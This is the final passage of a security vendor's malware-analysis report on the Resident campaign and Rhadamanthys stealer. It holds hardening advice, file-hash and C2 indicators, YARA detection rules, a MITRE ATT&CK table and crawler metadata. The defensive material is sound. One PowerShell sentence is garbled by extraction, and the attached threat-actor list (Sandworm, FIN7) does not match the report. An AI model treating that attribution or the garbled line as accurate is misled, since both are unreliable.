hunts to assess\r\ncustomer impact.\r\nRecommendations from eSentire’s Threat Response Unit (TRU)\r\nWe recommend implementing the following controls to help secure your organization against Rhadamanthys stealer and\r\nResident campaign:\r\nConfirm that all devices are protected with Endpoint Detection and Response (EDR) solutions.\r\nUsing Phishing and Security Awareness Training (PSAT), educate your employees regarding the risk of commodity\r\nstealers and drive-by downloads.\r\nEnsure standard procedures are in place for employees to submit potentially malicious content for review.\r\nUse Windows Attack Surface Reduction rules to block JavaScript and VBScript from launching downloaded content.\r\nWhile the TTPs used by adversaries grow in sophistication, they lead to a certain level of difficulties at which critical\r\nbusiness decisions must be made. Preventing the various attack paths utilized by threat actor(s) requires actively monitoring\r\nthe threat landscape, developing, and deploying endpoint detection, and the ability to investigate logs \u0026 network data during\r\nactive intrusions.\r\neSentire’s TRU is a world-class team of threat researchers who develop new detections enriched by original threat\r\nintelligence and leverage new machine learning models that correlate multi-signal data and automate rapid response to\r\nadvanced threats.\r\nIf you are not currently engaged with an MDR provider, eSentire MDR can help you reclaim the advantage and put your\r\nbusiness ahead of disruption.\r\nLearn what it means to have an elite team of Threat Hunters and Researchers that works for you. Connect with an eSentire\r\nSecurity Specialist.\r\nAppendix\r\nhttps://www.trendmicro.com/pl_pl/research/20/l/stealth-credential-stealer-targets-us-canadian-bank-customers.html\r\nhttps://isc.sans.edu/diary/29376\r\nhttps://socket.io/docs/v4/\r\nhttps://learn.microsoft.com/en-us/windows/win32/api/tlhelp32/nf-tlhelp32-createtoolhelp32snapshot\r\nhttps://twitter.com/Kostastsale/status/1607681239837966337?s=20\u0026t=f7VZgGvjiy7TLzBHd2bAKg\r\nhttps://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-2/\r\nIndicators of Compromise\r\nName Indicators\r\nInitial JS payload 9a68add12eb50dde7586782c3eb9ff9c\r\nInitial JS payload 38f030c2bfa6d74a35e2aeeee0341a244b63d15c200a808f07e3e98e7a841643\r\nResident2.exe 6e1cdf38adb2d052478c6ed8e06a336a\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign\r\nPage 28 of 34\n\nnsis_uns.dll 0b669e2eaf21429d273cf40b096166af\r\nAutoHotKey 4685811c853ceaebc991c3a8406694bf\r\nau3.ahk a3ee8449df56b6fa545392eff470d77d\r\nindex.js (backdoor) 5bdb1ac2a38ab3e43601eee055b1983f\r\nImdb.vbs c3f9b1fa3bcde637ec3d88ef6a350977\r\nMSI d741c5622ab1eafc0a7cfa5598a6ce77\r\nMSI 9a1115c0263cbff5a5c87704cc19cf5f\r\nsdv.vbs 381afda50832a82a16ee48edf54b620c\r\n7765676.exe (Cobalt Strike) f199b4ef3db12ee28a05b74e61cec548\r\nindex.js (screenshot sender) 44839c07923d8a37f49782e6a2567950\r\napp.js (i_view32.exe runner) 89e320093ce9d3a9e61e58c1121b76e7\r\ni_view32.exe b103655d23aab7ff124de7ea4fbc2361\r\nscreen1.pyw a628240139c04ec84c0e110ede5bb40b\r\nhcmd.exe f5182a0fa1f87c2c7538b9d8948ad3ce\r\ns.au3 (AutoIt script) b8822d99850ac70cb3de0e1d39639add\r\ns.vbs fbe2ed26374be91231f8a9056f28dddd\r\nwindows-kill.exe de5ecb14c8a2212beb309284b5a62aae\r\nCobalt Strike 62.204.41[.]155\r\nCobalt Strike 31.41.244[.]142\r\nCobalt Strike 62.204.41[.]171\r\nC2 85.192.49[.]106\r\nC2 89.107.10[.]7\r\nC2 79.132.128[.]79\r\nYara rules\r\nrule Resident_binary\r\n{\r\n meta:\r\n author = \"eSentire Threat Intelligence\"\r\n date = \"2023-01-17\"\r\n version = \"1.0\"\r\n MD5 = “6e1cdf38adb2d052478c6ed8e06a336a”\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign\r\nPage 29 of 34\n\nstrings:\r\n $certificate_blob = {\r\n C7 00 2D 2D 2D 2D\r\n C7 40 ?? 2D 42 45 47\r\n C7 40 ?? 49 4E 20 43\r\n C7 40 ?? 45 52 54 49\r\n C7 40 ?? 46 49 43 41\r\n C7 40 ?? 54 45 2D 2D\r\n C7 40 ?? 2D 2D 2D 0D\r\n C6 40 ?? 0A\r\n }\r\n $guid_build = {\r\n FF 15 ?? ?? ?? ??\r\n 48 8D 0D ?? ?? ?? ??\r\n E8 ?? ?? ?? ??\r\n 41 89 F1\r\n 41 89 D8\r\n 4C 89 E9\r\n 49 89 C4\r\n 0F B6 44 24 ??\r\n 89 7C 24 ??\r\n 4C 89 E2\r\n 89 44 24 ??\r\n 0F B6 44 24 ??\r\n 89 44 24 ??\r\n 0F B6 44 24 ??\r\n 89 44 24 ??\r\n 0F B6 44 24 ??\r\n 89 44 24 ??\r\n 0F B6 44 24 ??\r\n 89 44 24 ??\r\n 0F B6 44 24 ??\r\n 89 44 24 ??\r\n 0F B6 44 24 ??\r\n 89 44 24 ??\r\n 0F B6 44 24 ??\r\n 89 44 24 ??\r\n FF 15 ?? ?? ?? ??\r\n }\r\n \r\n condition:\r\n any of them\r\n \r\n}\r\nrule Rhadamanthys_Stealer {\r\n meta:\r\n author = \"eSentire Threat Intelligence\"\r\n date = \"2023-01-17\"\r\n version = \"1.0\"\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign\r\nPage 30 of 34\n\nstrings:\r\n $shellcode = {37 41 52 51 41 41 41 41 53 43 49 4A 41 51 41 45 41 41 41 42 49 41 49 42}\r\n $API1 = \"LoadLibraryA\"\r\n $API2 = \"CreateCompatibleBitmap\"\r\n $API3 = \"GetProcAddress\"\r\n \r\n condition:\r\n $shellcode and all of ($API*)\r\n}\r\nrule Rhadamanthys_Stealer {\r\n meta:\r\n author = \"eSentire Threat Intelligence\"\r\n date = \"2023-01-17\"\r\n version = \"1.0\"\r\n MD5 = \"ccefe8680b7d168a9e840d25a6925db3\"\r\n \r\n strings:\r\n $shellcode = {37 41 52 51 41 41 41 41 53 43 49 4A 41 51 41 45 41 41 41 42 49 41 49 42}\r\n $API1 = \"LoadLibraryA\"\r\n $API2 = \"CreateCompatibleBitmap\"\r\n $API3 = \"GetProcAddress\"\r\n \r\n condition:\r\n $shellcode and all of ($API*)\r\n}\r\nMITRE ATT\u0026CK\r\nMITRE\r\nATT\u0026CK\r\nTactic\r\nID\r\nMITRE\r\nATT\u0026CK\r\nTechnique\r\nDescription\r\nMITRE ATT\u0026CK\r\nTactic\r\nReconnaissance\r\nID\r\nT1592\r\nMITRE ATT\u0026CK\r\nTechnique\r\nGather Victim\r\nHost Information\r\nDescription\r\nResident performs the reconnaissance on the infected host,\r\nfor example viewing the members of the \"Domain Admins\"\r\ngroup in the current domain, IP configurations and the current\r\nuser's group memberships. It also gathers the information on\r\nactive processes, caption, command line, creation date,\r\ncomputer name, executable path, OS name, and Windows\r\nversion\r\nMITRE ATT\u0026CK\r\nTactic\r\nID MITRE ATT\u0026CK\r\nTechnique\r\nDescription\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign\r\nPage 31 of 34\n\nInitial Access T1566.001 Phishing Resident initial payload is delivered via a phishing email\r\ncontaining an attachment\r\nMITRE ATT\u0026CK\r\nTactic\r\nExecutionn\r\nID\r\nT1059.007\r\nMITRE ATT\u0026CK\r\nTechnique\r\nCommand and\r\nScripting\r\nInterpreter:\r\nJavaScript\r\nDescription\r\nInitial Resident payload is written in JavaScript\r\nMITRE ATT\u0026CK\r\nTactic\r\nPersistence\r\nID\r\nT1053.005\r\nMITRE ATT\u0026CK\r\nTechnique\r\nScheduled\r\nTask/Job:\r\nScheduled Task\r\nDescription\r\nResident creates a copy of itself and schedules a task to run it\r\nevery 10 minutes starting from the time when the binary was\r\nfirst executed\r\nMITRE ATT\u0026CK\r\nTactic\r\nPersistence\r\nID\r\nT1547.009\r\nMITRE ATT\u0026CK\r\nTechnique\r\nBoot or Logon\r\nAutostart\r\nExecution:\r\nShortcut\r\nModification\r\nDescription\r\nCUGraphic.lnk is created to run the AutoHotKey and\r\nImdb.vbs scripts\r\nMITRE ATT\u0026CK\r\nTactic\r\nCobalt Strike\r\nID\r\nS0154\r\nMITRE ATT\u0026CK\r\nTechnique\r\nDescription\r\nResident deploys Cobalt Strike on the infected hosts\r\nMITRE ATT\u0026CK\r\nTactic\r\nCollection\r\nID\r\nT1113\r\nMITRE ATT\u0026CK\r\nTechnique\r\nScreen Capture\r\nDescription\r\nResident campaign are utilizing various tools to capture the\r\nscreenshot of the infected host\r\nTo learn how your organization can build cyber resilience and prevent business disruption with eSentire’s Next Level\r\nMDR, connect with an eSentire Security Specialist now.\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign\r\nPage 32 of 34\n\nGET STARTED\r\nABOUT ESENTIRE’S THREAT RESPONSE UNIT (TRU)\r\nThe eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your\r\norganization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7 Security\r\nOperations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and works as an\r\nextension of your security team to continuously improve our Managed Detection and Response service. By providing\r\ncomplete visibility across your attack surface and performing global threat sweeps and proactive hypothesis-driven threat\r\nhunts augmented by original threat research, we are laser-focused on defending your organization against known and\r\nunknown threats.\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign\r\nPage 33 of 34\n\nSource: https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign\r\nhttps://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign\r\nPage 34 of 34\n\nThe malicious PowerShell The PowerShell script command mentioned loads kernel32.dll and before retrieves crypt32.dll via LoadLibraryA and executes the PowerShell and uses the script from function CryptStringToBinaryA 31.41.244[.]142.\nfrom crypt32.dll to convert the base64 string to a binary format (Figure 10).\n Page 7 of 34", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign" ], "report_names": [ "esentire-threat-intelligence-malware-analysis-resident-campaign" ], "threat_actors": [ { "id": "0661a292-80f3-420b-9951-a50e03c831c0", "created_at": "2023-01-06T13:46:38.928796Z", "updated_at": "2026-04-10T02:00:03.148052Z", "deleted_at": null, "main_name": "IRIDIUM", "aliases": [], "source_name": "MISPGALAXY:IRIDIUM", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "7bd810cb-d674-4763-86eb-2cc182d24ea0", "created_at": "2022-10-25T16:07:24.1537Z", "updated_at": "2026-04-10T02:00:04.883793Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "APT 44", "ATK 14", "BE2", "Blue Echidna", "CTG-7263", "FROZENBARENTS", "G0034", "Grey Tornado", "IRIDIUM", "Iron Viking", "Quedagh", "Razing Ursa", "Sandworm", "Sandworm Team", "Seashell Blizzard", "TEMP.Noble", "UAC-0082", "UAC-0113", "UAC-0125", "UAC-0133", "Voodoo Bear" ], "source_name": "ETDA:Sandworm Team", "tools": [ "AWFULSHRED", "ArguePatch", "BIASBOAT", "Black Energy", "BlackEnergy", "CaddyWiper", "Colibri Loader", "Cyclops Blink", "CyclopsBlink", "DCRat", "DarkCrystal RAT", "Fobushell", "GOSSIPFLOW", "Gcat", "IcyWell", "Industroyer2", "JaguarBlade", "JuicyPotato", "Kapeka", "KillDisk.NCX", "LOADGRIP", "LOLBAS", "LOLBins", "Living off the Land", "ORCSHRED", "P.A.S.", "PassKillDisk", "Pitvotnacci", "PsList", "QUEUESEED", "RansomBoggs", "RottenPotato", "SOLOSHRED", "SwiftSlicer", "VPNFilter", "Warzone", "Warzone RAT", "Weevly" ], "source_id": "ETDA", "reports": null }, { "id": "75455540-2f6e-467c-9225-8fe670e50c47", "created_at": "2022-10-25T16:07:23.740266Z", "updated_at": "2026-04-10T02:00:04.732992Z", "deleted_at": null, "main_name": "Iridium", "aliases": [], "source_name": "ETDA:Iridium", "tools": [ "CHINACHOPPER", "China Chopper", "LazyCat", "Powerkatz", "SinoChopper", "reGeorg" ], "source_id": "ETDA", "reports": null }, { "id": "f4f16213-7a22-4527-aecb-b964c64c2c46", "created_at": "2024-06-19T02:03:08.090932Z", "updated_at": "2026-04-10T02:00:03.6289Z", "deleted_at": null, "main_name": "GOLD NIAGARA", "aliases": [ "Calcium ", "Carbanak", "Carbon Spider ", "FIN7 ", "Navigator ", "Sangria Tempest ", "TelePort Crew " ], "source_name": "Secureworks:GOLD NIAGARA", "tools": [ "Bateleur", "Carbanak", "Cobalt Strike", "DICELOADER", "DRIFTPIN", "GGLDR", "GRIFFON", "JSSLoader", "Meterpreter", "OFFTRACK", "PILLOWMINT", "POWERTRASH", "SUPERSOFT", "TAKEOUT", "TinyMet" ], "source_id": "Secureworks", "reports": null }, { "id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad", "created_at": "2022-10-25T16:07:23.590051Z", "updated_at": "2026-04-10T02:00:04.679488Z", "deleted_at": null, "main_name": "Energetic Bear", "aliases": [ "ATK 6", "Blue Kraken", "Crouching Yeti", "Dragonfly", "Electrum", "Energetic Bear", "G0035", "Ghost Blizzard", "Group 24", "ITG15", "Iron Liberty", "Koala Team", "TG-4192" ], "source_name": "ETDA:Energetic Bear", "tools": [ "Backdoor.Oldrea", "CRASHOVERRIDE", "Commix", "CrackMapExec", "CrashOverride", "Dirsearch", "Dorshel", "Fertger", "Fuerboos", "Goodor", "Havex", "Havex RAT", "Hello EK", "Heriplor", "Impacket", "Industroyer", "Karagany", "Karagny", "LightsOut 2.0", "LightsOut EK", "Listrix", "Oldrea", "PEACEPIPE", "PHPMailer", "PsExec", "SMBTrap", "Subbrute", "Sublist3r", "Sysmain", "Trojan.Karagany", "WSO", "Webshell by Orb", "Win32/Industroyer", "Wpscan", "nmap", "sqlmap", "xFrost" ], "source_id": "ETDA", "reports": null }, { "id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa", "created_at": "2022-10-25T16:47:55.919702Z", "updated_at": "2026-04-10T02:00:03.618194Z", "deleted_at": null, "main_name": "IRON VIKING", "aliases": [ "APT44 ", "ATK14 ", "BlackEnergy Group", "Blue Echidna ", "CTG-7263 ", "ELECTRUM ", "FROZENBARENTS ", "Hades/OlympicDestroyer ", "IRIDIUM ", "Qudedagh ", "Sandworm Team ", "Seashell Blizzard ", "TEMP.Noble ", "Telebots ", "Voodoo Bear " ], "source_name": "Secureworks:IRON VIKING", "tools": [ "BadRabbit", "BlackEnergy", "GCat", "NotPetya", "PSCrypt", "TeleBot", "TeleDoor", "xData" ], "source_id": "Secureworks", "reports": null }, { "id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6", "created_at": "2022-10-25T15:50:23.339976Z", "updated_at": "2026-04-10T02:00:05.27483Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", "APT44" ], "source_name": "MITRE:Sandworm Team", "tools": [ "Bad Rabbit", "Mimikatz", "Exaramel for Linux", "Exaramel for Windows", "GreyEnergy", "PsExec", "Prestige", "P.A.S. Webshell", "AcidPour", "VPNFilter", "Neo-reGeorg", "Cyclops Blink", "SDelete", "Kapeka", "AcidRain", "Industroyer", "Industroyer2", "BlackEnergy", "Cobalt Strike", "NotPetya", "KillDisk", "PoshC2", "Impacket", "Invoke-PSImage", "Olympic Destroyer" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434590, "ts_updated_at": 1775792229, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/88d7e23d50bdd2004b74e136c76a22034d7d5563.pdf", "text": "https://archive.orkl.eu/88d7e23d50bdd2004b74e136c76a22034d7d5563.txt", "img": "https://archive.orkl.eu/88d7e23d50bdd2004b74e136c76a22034d7d5563.jpg" } }